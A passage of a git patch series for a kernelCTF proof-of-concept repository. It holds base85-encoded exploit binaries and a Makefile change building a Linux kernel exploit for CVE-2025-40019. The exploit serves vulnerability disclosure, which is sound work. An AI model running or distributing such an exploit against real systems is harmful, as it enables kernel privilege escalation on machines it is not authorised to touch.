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

Q)?wXI6msjw_#y0hB06locNTP4Uz&JE= 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 E0DyZ`ApigX literal 0 HcmV?d00001 From c3804ee240f0ca541fcde2dfccd43bb362fa81b8 Mon Sep 17 00:00:00 2001 From: Shinkurt <9161100+Shinkurt@users.noreply.github.com> Date: Mon, 27 Apr 2026 07:26:01 -0400 Subject: [PATCH 2/9] Rerun PR checks after CLA update From ea8280c5b8998a0308f7a337e61aa2da99aefc2e Mon Sep 17 00:00:00 2001 From: Shinkurt <9161100+Shinkurt@users.noreply.github.com> Date: Sat, 9 May 2026 11:10:31 -0400 Subject: [PATCH 3/9] Fix exp505 kernelCTF CI build artifacts --- .../exploit/mitigation-v4-6.12/Makefile | 7 ++++--- .../exploit/mitigation-v4-6.12/exploit | Bin 22704 -> 36568 bytes 2 files changed, 4 insertions(+), 3 deletions(-) diff --git a/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/exploit/mitigation-v4-6.12/Makefile b/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/exploit/mitigation-v4-6.12/Makefile index fc3f071de..d01601dfd 100644 --- a/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/exploit/mitigation-v4-6.12/Makefile +++ b/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/exploit/mitigation-v4-6.12/Makefile @@ -1,10 +1,11 @@ CC ?= gcc -CFLAGS ?= -O2 -w -DMIT_612 +CFLAGS ?= -O2 -g -w -DMIT_612 +LDFLAGS ?= -static all: exploit exploit: exploit.c - $(CC) -B/usr/bin/ $(CFLAGS) -o $@ $< + $(CC) -B/usr/bin/ $(CFLAGS) -o $@ $< $(LDFLAGS) clean: - rm -f exploit + rm -f exploit exploit_debug diff --git a/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/exploit/mitigation-v4-6.12/exploit b/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/exploit/mitigation-v4-6.12/exploit index 46aaa582d84964cd49fb6daca146cf191b1a9976..a0ed302b062b613182396a66bccdb87344f9f6f9 100755 GIT binary patch literal 36568 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 